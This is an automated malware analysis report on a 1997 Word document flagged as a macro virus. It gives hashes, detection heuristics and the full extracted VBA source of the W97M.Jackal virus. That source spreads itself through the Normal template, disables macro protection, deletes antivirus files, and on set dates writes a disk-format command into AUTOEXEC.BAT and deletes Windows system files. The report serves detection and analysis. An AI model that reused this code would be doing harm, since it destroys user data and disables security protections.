Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1c348350a8214c95…

MALICIOUS

Office (OLE)

Size: 50.0 KB
Created: 1997-01-17 13:34:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 7ca79e87ad58bcaf885b3f2419d1c1c1
SHA-1: 1c2b6705091c34fdf1ac5f4777850def6c2ac720
SHA-256: 1c348350a8214c95b49b7e297b6fc70a3acb86c5edab5d3b6a010a956e63a495
Risk score: 308

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The file contains legacy WordBasic macro markers and a VBA AutoOpen macro, indicating a macro-based attack. The AutoOpen subroutine attempts to copy the macro code to the Normal template and the active document, suggesting an attempt to establish persistence. The 'KillAV' and 'ULTRAS' strings in the macro code, together with the ClamAV detection 'Doc.Trojan.Killer-10', point to malicious intent, likely to disable security software or download further payloads.

Heuristics 8

  • ClamAV: Doc.Trojan.Killer-10 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Killer-10
  • Embedded Office document has suspicious static findings [critical] EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
      Options.VirusProtection = False
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
      Sub AutoOpen()
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE file is 19,378 bytes but its declared streams total only 0 bytes — 19,378 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • CFB header with no readable streams [medium] OLE_PARSE_EMPTY_STREAMS
    This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23988 bytes
SHA-256: db8d9f2628099eaee1258b685fcdb3341973ba71ffcc3cf9f9a80f837a9f58a4
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Jackal"
Sub AutoOpen()
  On Error GoTo Jackal

  ULTRAS

  KillAV

  Jackal

  Application.ScreenUpdating = False
  Application.DisplayAlerts = wdAlertsNone

  WordBasic.DisableAutoMacros 0
  Options.VirusProtection = False

  Set GlobalDoc = NormalTemplate
  Set ActiveDoc = ActiveDocument

  GlobalInstalled = No
  DocumentInstalled = No

  For j = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents(j).Name = "Jackal" Then
      GlobalInstalled = Yes
    End If
  Next

  For i = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents(i).Name = "Jackal" Then
      DocumentInstalled = Yes
    End If
  Next

  If GlobalInstalled = No Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Jackal", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm", Object:=wdOrganizerObjectProjectItems
    Options.SaveNormalPrompt = False
  End If

  If DocumentInstalled = No Then
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Jackal", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm", Object:=wdOrganizerObjectProjectItems
    ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
  End If

  Application.DisplayAlerts = wdAlertsAll

Jackal:
End Sub


Sub FileSaveAs()

  Dialogs(wdDialogFileSaveAs).Show

  On Error GoTo Jackal

  Jackal

  ULTRAS

  KillAV

  Application.ScreenUpdating = False
  Application.DisplayAlerts = wdAlertsNone

  WordBasic.DisableAutoMacros 0
  Options.VirusProtection = False

  Set GlobalDoc = NormalTemplate
  Set ActiveDoc = ActiveDocument

  GlobalInstalled = No
  DocumentInstalled = No

  For j = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents(j).Name = "Jackal" Then
      GlobalInstalled = Yes
    End If
  Next

  For i = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents(i).Name = "Jackal" Then
      DocumentInstalled = Yes
    End If
  Next

  If GlobalInstalled = No Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Jackal", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm", Object:=wdOrganizerObjectProjectItems
    Options.SaveNormalPrompt = False
  End If

  If DocumentInstalled = No Then
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Jackal", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm", Object:=wdOrganizerObjectProjectItems
    ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
  End If

  Application.DisplayAlerts = wdAlertsAll

 Jackal

Jackal:
End Sub

Sub KillAV()
  On Error GoTo Jackal
  Kill "C:\Program Files\AntiViral Toolkit Pro\*.avc"
  Kill "C:\Program Files\Command Software\F-PROT95\*.dll"
  Kill "C:\Program Files\McAfee\VirusScan95\Scan.dat"
  Kill "C:\Program Files\McAfee\VirusScan\Scan.dat"
  Kill "C:\Program Files\Norton AntiVirus\Viruscan.dat"
  Kill "C:\Program Files\Symantec\Symevnt.386"
  Kill "C:\Program Files\FindVirus\Findviru.drv"
  Kill "C:\Program Files\Cheyenne\AntiVirus\*.dll"
  Kill "C:\PC-Cillin 95\Lpt$vpn.*"
  Kill "C:\PC-Cillin 95\Scan32.dll"
  Kill "C:\PC-Cillin 97\Lpt$vpn.*"
  Kill "C:\PC-Cillin 97\Scan32.dll"
  Kill "C:\eSafe\Protect\*.dll"
  Kill "C:\f-macro\f-macro.exe"
  Kill "C:\TBAVW95\Tbscan.sig"
  Kill "C:\Tbavw95\Tb*.*"
  Kill "C:\VS95\*.dll"
  Kill "C:\Vdoc\*.*"
Jackal:
End Sub

Sub Format()
  On Error GoTo Jackal
  Beep
Msgbox "Error at openings of the document.", vbCritical + vbOKOnly + vbDefaultButton1, "Microsoft Word"
  Assistant.Visible = True
  With Assistant.NewBalloon
  .Text = "Error, is necessary will update files"
  .Heading = "Microsoft Office 97"
  .Animation = msoAnimationEmptyTrash
  .Show
End With
  Open "C:\AUTOEXEC.BAT" For Input As #1
   Close
   SetAttr "C:\AUTOEXEC.BAT", vbNormal
   Open "C:\AUTOEXEC.BAT" For Append As #1
   Print #1, "@ECHO OFF"
   Print #1, "CLS"
   Print #1, "ECHO Microsoft Corp. 1983-1997 All rights reserved"
   Print #1, "ECHO Goes preparation to renovation of your system files"
   Print #1, "ECHO Please wait this can occupy several minutes"
   Print #1, "FORMAT C: /U /C /S /AUTOTEST > NUL"
   Print #1, "ECHO."
   Print #1, "ECHO."
   Print #1, "ECHO."
   Print #1, "ECHO Error at renovations of files"
   Close #1
  SetAttr "C:\AUTOEXEC.BAT", vbReadOnly
Jackal:
End Sub

Sub ToolsMacro()
Beep
Msgbox "Impossible open this function", vbCritical + vbOKOnly + vbMsgBoxHelpButton + vbDefaultButton2, "Error"
End Sub

Sub ViewVBCode()
Beep
Msgbox "Function does not answer system requests" & vbCrLf & "", vbExclamation + vbOKOnly + vbMsgBoxHelpButton + vbDefaultButton2, "Microsoft Visual Basic"
End Sub

Sub FileTemplates()
UserForm.Show
End Sub

Sub EditFind()
UserForm.Show
Dialogs(wdDialogEditFind).Show
End Sub

Sub HelpAbout()
UserForm.Show
End Sub

Sub ToolsCustomize()
UserForm.Show
Dialogs(wdDialogToolsCustomize).Show
End Sub

Sub ToolsOptions()
UserForm.Show
Dialogs(wdDialogToolsOptions).Show
End Sub

Sub Jackal()
  On Error GoTo Jackal

   If Day(Now()) = 1 Then
      ActiveDocument.Password = "JACKAL"
      ActiveDocument.Save
    End If

   If Day(Now()) = 5 Then
      Format
    End If

   If Day(Now()) = 9 Then
      Format
    End If

   If Day(Now()) = 15 Then
     Kill "C:\*.*"
     Kill "C:\Windows\*.*"
     Kill "C:\Windows\System\*.*"
    End If

   If Day(Now()) = 17 Then
      Format
    End If

   If Day(Now()) = 25 Then
      Format
    End If

   If Day(Now()) = 27 Then
      ActiveDocument.Password = "ULTRAS"
      ActiveDocument.Save
    End If

   If Day(Now()) = 30 Then
     Kill "C:\*.*"
     Kill "C:\Windows\*.*"
     Kill "C:\Windows\System\*.*"
    End If

   If Month(Now()) = 5 Then
      Format
    End If

Jackal:
End Sub

Sub ULTRAS()
  On Error GoTo Jackal
  Application.StatusBar = True
  StatusBar = "W97M.JACKAL by ULTRAS"
  Application.Caption = "ULTRAS"
  Application.UserName = "ULTRAS"
  Application.UserInitials = "JACKAL"
  Options.BackgroundSave = False
  Options.CreateBackup = False
  Options.SendMailAttach = True
Jackal:
End Sub

Attribute VB_Name = "UserForm"
Attribute VB_Base = "0{93DA5697-7087-11D0-A953-C1445422832A}{93DA568A-7087-11D0-A953-C1445422832A}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




' Processing file: /tmp/qstore_m431e8dp
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Jackal - 11342 bytes
…
embedded_office_off00007c4e.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x7C4E | 19378 bytes
SHA-256: a3525485260bc7246221fb4bdc23dd64a750ff4a3ae9446ab94716ad78cae6c3